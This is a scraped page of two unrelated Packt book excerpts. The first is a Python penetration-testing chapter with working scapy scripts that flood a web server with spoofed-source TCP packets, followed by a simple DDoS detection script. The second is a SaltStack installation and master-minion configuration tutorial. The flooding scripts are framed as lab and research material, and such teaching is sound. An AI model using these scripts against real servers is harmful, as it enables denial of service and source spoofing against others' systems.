- socket.ntohl(x): This is the network to host long. It converts a 32-bit positive integer from the network to the host byte order.
- socket.ntohs(x): This is the network to host short. It converts a 16-bit positive integer from the network to the host byte order.
- socket.htonl(x): This is the host to network long. It converts a 32-bit positive integer from the host to the network byte order.
- socket.htons(x): This is the host to network short. It converts a 16-bit positive integer from the host to the network byte order.

So, what is the significance of the preceding four methods? Consider the 16-bit number 0000000000000011 (3). When you send this number from one computer to another, its two bytes might be interpreted in the opposite order, so the receiving computer might read it as 0000001100000000 (768). These methods convert from your native byte order to the network byte order and back again.

Now, let's look at the code to implement a network sniffer, which will work on three layers of TCP/IP, that is, the physical layer (Ethernet), the network layer (IP), and the TCP layer (port).

Introducing DoS and DDoS

In this section, we are going to discuss one of the most deadly attacks, called the Denial-of-Service attack. The aim of this attack is to consume machine or network resources, making them unavailable to the intended users. Generally, attackers use this attack when every other attack fails. This attack can be done at the data link, network, or application layer. Usually, a web server is the target for hackers.
In a DoS attack, the attacker sends a huge number of requests to the web server, aiming to consume network bandwidth and machine memory. In a Distributed Denial-of-Service (DDoS) attack, the attacker sends a huge number of requests from different IPs. In order to carry out DDoS, the attacker can use Trojans or IP spoofing. In this section, we will carry out various experiments to complete our reports.

Single IP single port

In this attack, we send a huge number of packets to the web server using a single IP (which might be spoofed) and from a single source port number. This is a very low-level DoS attack, and it will test the web server's request-handling capacity.

The following is the code of sisp.py:

    from scapy.all import *

    src = raw_input("Enter the Source IP ")
    target = raw_input("Enter the Target IP ")
    srcport = int(raw_input("Enter the Source Port "))

    i = 1
    while True:
        # Build a TCP packet from the chosen source IP and port to port 80 on the target
        IP1 = IP(src=src, dst=target)
        TCP1 = TCP(sport=srcport, dport=80)
        pkt = IP1 / TCP1
        send(pkt, inter=.001)
        print "packet sent ", i
        i = i + 1

I have used scapy to write this code, and I hope that you are familiar with it. The preceding code asks for three things: the source IP address, the destination IP address, and the source port number.

Let's check the output on the attacker's machine:

Single IP with single port

I have used a spoofed IP in order to hide my identity. You will have to send a huge number of packets to check the behavior of the web server. During the attack, try to open a website hosted on the web server. Irrespective of whether it works or not, write your findings in the reports.

Let's check the output on the server side:

Wireshark output on the server

This output shows that our packet was successfully sent to the server. Repeat this program with different sequence numbers.

Single IP multiple port

Now, in this attack, we use a single IP address but multiple ports.
Here, I have written the code of the simp.py program:

    from scapy.all import *

    src = raw_input("Enter the Source IP ")
    target = raw_input("Enter the Target IP ")

    i = 1
    while True:
        # Cycle through the source ports for every pass of the outer loop
        for srcport in range(1, 65535):
            IP1 = IP(src=src, dst=target)
            TCP1 = TCP(sport=srcport, dport=80)
            pkt = IP1 / TCP1
            send(pkt, inter=.0001)
            print "packet sent ", i
            i = i + 1

I used the for loop for the ports. Let's check the output of the attacker:

Packets from the attacker's machine

The preceding screenshot shows that the packet was sent successfully. Now, check the output on the target machine:

Packets appearing in the target machine

In the preceding screenshot, the rectangular box shows the port numbers. I will leave it to you to create the multiple IP with a single port variant.

Multiple IP multiple port

In this section, we will discuss multiple IPs with multiple ports. In this attack, we use different IPs to send the packet to the target. Multiple IPs denote spoofed IPs. The following program will send a huge number of packets from spoofed IPs:

    import random
    from scapy.all import *

    target = raw_input("Enter the Target IP ")

    i = 1
    while True:
        # Build a random source IP address from four random octets
        a = str(random.randint(1, 254))
        b = str(random.randint(1, 254))
        c = str(random.randint(1, 254))
        d = str(random.randint(1, 254))
        dot = "."
        src = a + dot + b + dot + c + dot + d
        print src

        # Pick a random range of source ports
        st = random.randint(1, 1000)
        en = random.randint(1000, 65535)
        loop_break = 0
        for srcport in range(st, en):
            IP1 = IP(src=src, dst=target)
            TCP1 = TCP(sport=srcport, dport=80)
            pkt = IP1 / TCP1
            send(pkt, inter=.0001)
            print "packet sent ", i
            loop_break = loop_break + 1
            i = i + 1
            # Move on to a new source IP after 50 packets
            if loop_break == 50:
                break

In the preceding code, we used the a, b, c, and d variables to store four random numbers from 1 to 254 as strings. The src variable stores the resulting random IP address. Here, we have used the loop_break variable to break the for loop after 50 packets. It means 50 packets originate from one IP, while the rest of the code is the same as the previous one.
Let's check the output of the mimp.py program:

Multiple IP with multiple ports

In the preceding screenshot, you can see that after packet 50, the IP addresses get changed. Let's check the output on the target machine:

The target machine's output on Wireshark

Use several machines and execute this code. In the preceding screenshot, you can see that the machine replies to the source IP. This type of attack is very difficult to detect because it is very hard to distinguish whether the packets are coming from a valid host or a spoofed host.

Detection of DDoS

When I was pursuing my Masters of Engineering degree, my friend and I were working on a DDoS attack. This is a very serious attack and difficult to detect, because it is nearly impossible to guess whether the traffic is coming from a fake host or a real host. In a DoS attack, traffic comes from only one source, so we can block that particular host. Based on certain assumptions, we can make rules to detect DDoS attacks. If the web server serves only on port 80, then only traffic to port 80 should be allowed. Now, let's go through a very simple program to detect a DDoS attack. The program's name is DDOS_detect1.py:

    import socket
    import struct
    from datetime import datetime

    # Raw packet socket (Linux only, requires root)
    s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8)
    dict = {}

    # Log file, opened in append mode, with a timestamp header
    file_txt = open("dos.txt", 'a')
    file_txt.writelines("**********")
    t1 = str(datetime.now())
    file_txt.writelines(t1)
    file_txt.writelines("**********")
    file_txt.writelines("\n")
    print "Detection Start ......."

    D_val = 10
    D_val1 = D_val + 10

    while True:
        pkt = s.recvfrom(2048)
        ipheader = pkt[0][14:34]      # skip the 14-byte Ethernet header
        ip_hdr = struct.unpack("!8sB3s4s4s", ipheader)
        IP = socket.inet_ntoa(ip_hdr[3])
        print "Source IP", IP
        if dict.has_key(IP):
            dict[IP] = dict[IP] + 1
            print dict[IP]
            if (dict[IP] > D_val) and (dict[IP] < D_val1):
                line = "DDOS Detected "
                file_txt.writelines(line)
                file_txt.writelines(IP)
                file_txt.writelines("\n")
        else:
            dict[IP] = 1

In the previous code, we used a sniffer to get the packet's source IP address.
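To see what the "!8sB3s4s4s" format extracts from the IP header, the following sketch builds a sample Ethernet frame in memory and parses it the same way. It is written for Python 3, not the Python 2.7 used in the listing, and needs neither a raw socket nor root access. The source_ip helper, the constants, and the sample addresses are hypothetical names and values chosen for illustration.

```python
import socket
import struct

ETH_HEADER_LEN = 14   # destination MAC, source MAC, EtherType
IP_HEADER_LEN = 20    # IPv4 header without options


def source_ip(frame):
    """Return (ttl, source address) from a raw Ethernet frame carrying IPv4."""
    ip_header = frame[ETH_HEADER_LEN:ETH_HEADER_LEN + IP_HEADER_LEN]
    # 8s: bytes 0-7, B: TTL, 3s: protocol and checksum,
    # 4s: source address, 4s: destination address
    _, ttl, _, src, _ = struct.unpack("!8sB3s4s4s", ip_header)
    return ttl, socket.inet_ntoa(src)


# Build a sample frame: a zeroed Ethernet header plus a minimal IPv4 header.
sample_header = struct.pack(
    "!BBHHHBBH4s4s",
    0x45, 0, 20, 0, 0,    # version/IHL, TOS, total length, ID, flags/fragment
    64, 6, 0,             # TTL, protocol (TCP), checksum (left at 0 here)
    socket.inet_aton("10.0.0.5"),
    socket.inet_aton("192.168.0.1"),
)
frame = b"\x00" * ETH_HEADER_LEN + sample_header

ttl, src = source_ip(frame)
print(ttl, src)
```

The fourth unpacked field, index 3 in the listing's ip_hdr tuple, is the 4-byte source address that socket.inet_ntoa() turns into dotted notation.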
The file_txt = open("dos.txt",'a') statement opens a file in append mode, and this dos.txt file is used as a logfile to record detected DDoS attacks. Whenever the program runs, the file_txt.writelines(t1) statement writes the current time. The D_val =10 variable is an assumption made just for the demonstration of the program. In practice, the value is chosen by viewing the statistics of hits from a particular IP. Consider the case of a tutorial website. The number of hits from the IPs of colleges and schools would be higher than from other IPs. If a huge number of requests come in from a new IP, then it might be a case of DoS. If the count of the incoming packets from one IP exceeds the D_val variable, then the IP is considered to be responsible for a DDoS attack. The D_val1 variable is used later in the code to avoid redundancy.

I hope you are familiar with the code before the if dict.has_key(IP): statement. This statement checks whether the key (IP address) exists in the dictionary or not. If the key exists in dict, then the dict[IP]=dict[IP]+1 statement increases the dict[IP] value by 1, which means that dict[IP] contains a count of the packets that come from a particular IP. The if(dict[IP]>D_val) and (dict[IP]<D_val1) : statement is the criterion used to detect the attack and write results in the dos.txt file; if(dict[IP]>D_val) detects whether the incoming packet's count exceeds the D_val value or not. If it does, the subsequent statements write the IP in dos.txt each time a new packet arrives. To avoid redundancy, the (dict[IP]<D_val1) condition has been used, so the IP is no longer written once its count reaches D_val1.

Run the program on a server and run mimp.py on the attacker's machine. The following screenshot shows the dos.txt file. Look at that file. It writes a single IP nine times because, with D_val1 = D_val+10, only packet counts 11 through 19 satisfy both conditions. You can change the D_val value to set the number of requests allowed from a particular IP. The right value depends on the past statistics of the website.
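The counting logic described above can be tried without a raw socket. The following is a minimal Python 3 sketch, not the program from the article: the names source_ip and record_hit are hypothetical, and the frame is assumed to be an Ethernet frame carrying an IPv4 header without options, as in the original slicing.

```python
import socket
import struct
from collections import Counter

ETH_HEADER_LEN = 14  # the Ethernet header precedes the IP header in a raw frame
IP_HEADER_LEN = 20   # minimal IPv4 header, assuming no options


def source_ip(frame: bytes) -> str:
    """Return the dotted-quad source address of an Ethernet/IPv4 frame."""
    ip_header = frame[ETH_HEADER_LEN:ETH_HEADER_LEN + IP_HEADER_LEN]
    # Same format string as DDOS_detect1.py: field 3 is the source address.
    fields = struct.unpack("!8sB3s4s4s", ip_header)
    return socket.inet_ntoa(fields[3])


def record_hit(counts: Counter, ip: str, d_val: int = 10, window: int = 10) -> bool:
    """Count one packet from ip; return True while d_val < count < d_val + window."""
    counts[ip] += 1
    return d_val < counts[ip] < d_val + window


if __name__ == "__main__":
    # Hand-built frame: 14 Ethernet bytes, 12 IP header bytes, source, destination.
    frame = bytes(14) + bytes(12) + bytes([10, 0, 0, 5]) + bytes([10, 0, 0, 1])
    counts = Counter()
    logged = sum(record_hit(counts, source_ip(frame)) for _ in range(25))
    print(source_ip(frame), "would be logged", logged, "times")
```

Keeping the parsing and the threshold test in separate functions makes it easier to experiment with different D_val values against recorded traffic before sniffing on a live server.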
I hope the preceding code will be useful for research purposes.

Detecting a DDoS attack

If you are a security researcher, the preceding program should be useful to you. You can modify the code so that only packets destined for port 80 are allowed.

Summary

In this article, we learned about penetration testing using Python. We also learned about sniffing using a Python script, about client-side validation, and about how to bypass client-side validation. We also learned in which situations client-side validation is a good choice. We have gone through how to use Python to fill in a form and send the parameters where the GET method has been used. As a penetration tester, you should know how parameter tampering affects a business. Four types of DoS attacks have been presented in this article. A single IP attack falls into the category of a DoS attack, and a multiple IP attack falls into the category of a DDoS attack. This section is helpful not only for a pentester but also for researchers. Building on the Python DDoS-detection script, you can modify the code and create larger programs that trigger actions to control or mitigate a DDoS attack on the server.

Packt

04 Feb 2015

12 min read

Calling your fellow agents

Packt

04 Feb 2015

11 min read

Introducing Salt


In this article by Colton Myers, author of the book Learning SaltStack, we will learn the basic architecture of a Salt deployment.

The two main pieces of Salt are the Salt Master and the Salt Minion. The master is the central hub. All minions connect to the master to receive instructions. From the master, you can run commands and apply configuration across hundreds or thousands of minions in seconds. The minion, as mentioned before, connects to the master and treats the master as the source of all truth. Although minions can exist without a master, the full power of Salt is realized when you have minions and the master working together.

Salt is built on two major concepts: remote execution and configuration management. In the remote execution system, Salt leverages Python to accomplish complex tasks with single-function calls. The configuration management system in Salt, called States, builds upon the remote execution foundation to create repeatable, enforceable configuration for the minions. With this bird's-eye view in mind, let's get Salt installed so that we can start learning how to use it to make managing our infrastructure easier!

(For more resources related to this topic, see here.)

Installing Salt

The dependencies for running Salt at the time of writing are as follows:

Python 2: Version 2.6 or greater (not Python 3-compatible)
msgpack-python
YAML
Jinja2
MarkupSafe
Apache Libcloud
Requests
ZeroMQ: Version 3.2.0 or greater
PyZMQ: Version 2.2.0 or greater
PyCrypto
M2Crypto

The easiest way to ensure that the dependencies for Salt are met is to use system-specific package management systems, such as apt on Ubuntu systems, that will handle the dependency resolution automatically. You can also use a script called Salt-Bootstrap to handle all of the system-specific commands for you. Salt-Bootstrap is an open source project with the goal of creating a Bourne shell-compatible script that will install Salt on any compatible server.
The project is managed and hosted by the SaltStack team. You can find more information at https://github.com/saltstack/salt-bootstrap. We will explore each of these methods of installation in turn.

Installation with system packages (Ubuntu)

The latest release of Salt for Ubuntu is provided in a Personal Package Archive (PPA), which is a type of package repository for Ubuntu. The easiest way to access the PPA to install Salt is using the add-apt-repository command, as follows:

    # sudo add-apt-repository ppa:saltstack/salt

If the add-apt-repository command is not found, you can add it by installing the python-software-properties package:

    # sudo apt-get install python-software-properties

If you are using Ubuntu Version 12.10 or greater, this step should not be required as the add-apt-repository command should be included in the base system.

After you have added the repository, you must update the package management database, as follows:

    # sudo apt-get update

If the system asks whether you should accept a gpg key, press Enter to accept. You should then be able to install the Salt master and the Salt minion with the following command:

    # sudo apt-get install salt-master salt-minion

Assuming there are no errors after running this command, you should be done! Salt is now installed on your machine. Note that we installed both the Salt master and the Salt minion. The term master refers to the central server, that is, the server from which we will be controlling all of our other servers. The term minion refers to the servers connected to and controlled by a master.

Installing with Salt-Bootstrap

Information about manual installation on other major Linux distributions can be found online, at http://docs.saltstack.com. However, in most cases, it is easier and more straightforward to use a tool called Salt-Bootstrap.
In-depth documentation can be found on the project page at https://github.com/saltstack/salt-bootstrap. However, the tool is actually quite easy to use, as follows:

    # curl -L https://bootstrap.saltstack.com -o install_salt.sh
    # sudo sh install_salt.sh -h

We won't include the help text for Bootstrap here as it would take up too much space. However, it should be noted that, by default, Bootstrap will install only the Salt minion. We want both the Salt minion and the Salt master, which can be accomplished by passing in the -M flag, as follows:

    # sudo sh install_salt.sh -M

The preceding command will result in a fully-functional installation of Salt on your machine! The supported operating system list is extensive, as follows:

Amazon Linux AMI 2012.09
Arch Linux
CentOS 5/6
Debian 6.x/7.x/8 (git installations only)
Fedora 17/18
FreeBSD 9.1/9.2/10
Gentoo Linux
Linaro
Linux Mint 13/14
OpenSUSE 12.x
Oracle Linux 5/6
RHEL 5/6
Scientific Linux 5/6
SmartOS
SuSE 11 SP1 and 11 SP2
Ubuntu 10.x/11.x/12.x/13.x/14.x

The version of Salt used for the examples in this book is the 2014.7 release. Here is the full version information:

    # sudo salt --versions-report
    Salt: 2014.7.0
    Python: 2.7.6
    Jinja2: 2.7.2
    M2Crypto: 0.21.1
    msgpack-python: 0.3.0
    msgpack-pure: Not Installed
    pycrypto: 2.6.1
    libnacl: Not Installed
    PyYAML: 3.10
    ioflo: Not Installed
    PyZMQ: 14.0.1
    RAET: Not Installed
    ZMQ: 4.0.4
    Mako: 0.9.1

It's probable that the version of Salt you installed is a newer release and might have slightly different output. However, the examples should still all work in the latest version of Salt.

Configuring Salt

Now that we have the master and the minion installed on our machine, we must do a couple of pieces of configuration in order to allow them to talk to each other.

Firewall configuration

Since Salt minions connect to masters, the only firewall configuration that must be done is on the master. By default, ports 4505 and 4506 must be able to accept incoming connections on the master.
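To see whether a master is reachable on those two ports, a quick TCP connection test can help. The following is a minimal sketch in Python 3 using only the standard socket module; the function names port_is_open and check_master_ports are hypothetical, and the test only shows that something accepts TCP connections on the port, not that it is a Salt master.

```python
import socket

SALT_MASTER_PORTS = (4505, 4506)  # default master ports named in the text


def port_is_open(host: str, port: int, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts, and unreachable hosts.
        return False


def check_master_ports(host: str) -> dict:
    """Map each default Salt master port to its reachability from this machine."""
    return {port: port_is_open(host, port) for port in SALT_MASTER_PORTS}


if __name__ == "__main__":
    for port, is_open in check_master_ports("localhost").items():
        print(port, "open" if is_open else "closed or filtered")
```

Running this from the minion's machine, with the master's address in place of localhost, gives a first hint about whether a firewall sits between the two.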
The default install of Ubuntu 14.04, used for these examples, actually requires no firewall configuration out-of-the-box to be able to run Salt; the ports required are already open. However, many distributions of Linux come with much more restrictive default firewall settings. The most common firewall software in use by default is iptables. Note that you might also have to change firewall settings on your network hardware if there is network filtering in place outside the software on the machine on which you're working.

Firewall configuration is a topic that deserves its own book. However, our needs for the configuration of Salt are fairly simple. First, you must find the set of rules currently in effect for your system. This varies from system to system; for example, the file is located in /etc/sysconfig/iptables on RedHat distributions, while it is located in /etc/iptables/iptables.rules in Arch Linux. Once you find that file, add the following lines to that file, but be sure to do it above the line that says DROP:

    -A INPUT -m state --state new -m tcp -p tcp --dport 4505 -j ACCEPT
    -A INPUT -m state --state new -m tcp -p tcp --dport 4506 -j ACCEPT

For more information about configuring the firewall on your operating system of choice so that your Salt minion can connect successfully to your Salt master, see the Salt documentation at http://docs.saltstack.com/en/latest/topics/tutorials/firewall.html.

In version 2014.7.0, a new experimental transport option was introduced in Salt, called RAET. The use of this transport system is beyond the scope of this book. This book will deal exclusively with the default, ZeroMQ-based transport in Salt.

Salt minion configuration

Out of the box, the Salt minion is configured to connect to a master at the location salt. The reason for this default is that, if DNS is configured correctly such that salt resolves to the master's IP address, no further configuration is needed. The minion will connect successfully to the master.
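Whether the default name salt resolves on a given machine can be checked with a few lines of Python 3. This is a minimal sketch using the standard library's socket.gethostbyname; the helper name resolve_master is hypothetical and is not part of Salt.

```python
import socket
from typing import Optional


def resolve_master(name: str = "salt") -> Optional[str]:
    """Return the IPv4 address that name resolves to, or None if it does not resolve."""
    try:
        return socket.gethostbyname(name)
    except OSError:
        # socket.gaierror (a subclass of OSError) is raised when resolution fails.
        return None


if __name__ == "__main__":
    address = resolve_master()
    if address is None:
        print("'salt' does not resolve; set master explicitly in the minion config")
    else:
        print("'salt' resolves to", address)
```

If the name does not resolve, the minion has to be pointed at the master by hand.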
However, in our example, we do not have any DNS configuration in place, so we must configure this ourselves.

The minion and master configuration files are located in the /etc/salt/ directory. The /etc/salt/ directory should be created as part of the installation of Salt, assuming you followed the preceding directions. If it does not exist for some reason, please create the directory, and create two files, minion and master, within the directory.

Open /etc/salt/minion with your text editor of choice (remember to use sudo!). We will be making a couple of changes to this file. First, find the commented-out line for the configuration option master. It should look like this:

    #master: salt

Uncomment that line and change salt to localhost (as we have this minion connected to the local master). It should look like this:

    master: localhost

If you cannot find the appropriate line in the file, just add the line shown previously to the top of the file.

You should also manually configure the minion ID so that you can more easily follow along with the examples in this text. Find the ID line:

    #id:

Uncomment it and set it to myminion:

    id: myminion

Again, if you cannot find the appropriate line in the file, just add the line shown previously to the top of the file. Save and close the file.

Without a manually-specified minion ID, the minion will try to intelligently guess what its minion ID should be at startup. For most systems, this will mean the minion ID will be set to the Fully-Qualified Domain Name (FQDN) for the system.

Starting the Salt master and Salt minion

Now we need to start (or restart) our Salt master and Salt minion. Assuming you're following along on Ubuntu (which I recommend), you can use the following commands:

    # sudo service salt-minion restart
    # sudo service salt-master restart

Packages in other supported distributions ship with init scripts for Salt. Use whichever service system is available to you to start or restart the Salt minion and Salt master.
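The two edits to /etc/salt/minion described earlier (setting master and id) follow the same rule: replace the commented-out line if it exists, otherwise add the line at the top of the file. A minimal Python 3 sketch of that rule is shown below; set_option is a hypothetical helper, it works on the file's text rather than on the file itself, and it only handles simple top-level key: value lines.

```python
import re


def set_option(config_text: str, key: str, value: str) -> str:
    """Set 'key: value', replacing a commented-out or existing line, else prepend it."""
    # Match the key at the start of a line, optionally commented out with '#'.
    pattern = re.compile(r"^#?[ \t]*" + re.escape(key) + r":.*$", re.MULTILINE)
    new_line = f"{key}: {value}"
    if pattern.search(config_text):
        return pattern.sub(new_line, config_text, count=1)
    # Not found: add the line to the top of the file, as the text suggests.
    return new_line + "\n" + config_text


if __name__ == "__main__":
    original = "#master: salt\n#id:\n"
    updated = set_option(set_option(original, "master", "localhost"), "id", "myminion")
    print(updated, end="")
```

Applying it to the real file would still require reading and writing /etc/salt/minion with root privileges, followed by a restart of the minion service.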
Accepting the minion key on the master

There is one last step remaining before we can run our first Salt commands. We must tell the master that it can trust the minion. For this, Salt comes with the salt-key command to help us manage minion keys:

    # sudo salt-key
    Accepted Keys:
    Unaccepted Keys:
    myminion
    Rejected Keys:

Notice that our minion, myminion, is listed in the Unaccepted Keys section. This means that the minion has contacted the master and the master has cached that minion's public key, and is waiting for further instructions as to whether to accept the minion or not.

If your minion is not showing up in the output of salt-key, it's possible that the minion cannot reach the master on ports 4505 and 4506. Please refer to the Firewall configuration section described previously for more information. Troubleshooting information can also be found in the Salt documentation at http://docs.saltstack.com/en/latest/topics/troubleshooting/.

We can inspect the key's fingerprint to ensure that it matches our minion's key, as follows:

    # sudo salt-key -f myminion
    Unaccepted Keys:
    myminion: a8:1f:b0:c2:ab:9d:27:13:60:c9:81:b1:11:a3:68:e1

We can use the salt-call command to run a command on the minion to obtain the minion's key, as follows:

    # sudo salt-call --local key.finger
    local:
        a8:1f:b0:c2:ab:9d:27:13:60:c9:81:b1:11:a3:68:e1

Since the fingerprints match, we can accept the key on the master, as follows:

    # sudo salt-key -a myminion
    The following keys are going to be accepted:
    Unaccepted Keys:
    myminion
    Proceed? [n/Y] Y
    Key for minion myminion accepted.

We can check that the minion key was accepted, as follows:

    # sudo salt-key
    Accepted Keys:
    myminion
    Unaccepted Keys:
    Rejected Keys:

Success! We are ready to run our first Salt command!

Summary

We've covered a lot of ground in this article. We've installed the Salt minion and Salt master on our machines and configured them to talk to each other, including accepting the minion's key on the master.
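As a small addendum to the key-acceptance step, the fingerprint comparison can be done by a script instead of by eye. The following Python 3 sketch works on the text printed by salt-key -f and salt-call --local key.finger; the function names are hypothetical, and the pattern assumes colon-separated hex pairs like those shown in this article (newer releases may print longer fingerprints, which the pattern also accepts).

```python
import re
from typing import Optional

# At least 16 colon-separated hex pairs, as in the outputs shown in the article.
FINGERPRINT_RE = re.compile(r"\b[0-9a-f]{2}(?::[0-9a-f]{2}){15,}\b")


def extract_fingerprint(output: str) -> Optional[str]:
    """Return the first key fingerprint found in command output, or None."""
    match = FINGERPRINT_RE.search(output.lower())
    return match.group(0) if match else None


def fingerprints_match(master_output: str, minion_output: str) -> bool:
    """Return True only if both outputs contain the same fingerprint."""
    master_fp = extract_fingerprint(master_output)
    minion_fp = extract_fingerprint(minion_output)
    return master_fp is not None and master_fp == minion_fp


if __name__ == "__main__":
    master_out = ("Unaccepted Keys:\n"
                  "myminion: a8:1f:b0:c2:ab:9d:27:13:60:c9:81:b1:11:a3:68:e1\n")
    minion_out = "local:\n    a8:1f:b0:c2:ab:9d:27:13:60:c9:81:b1:11:a3:68:e1\n"
    print("fingerprints match:", fingerprints_match(master_out, minion_out))
```

Only when the two values agree should the key be accepted with salt-key -a.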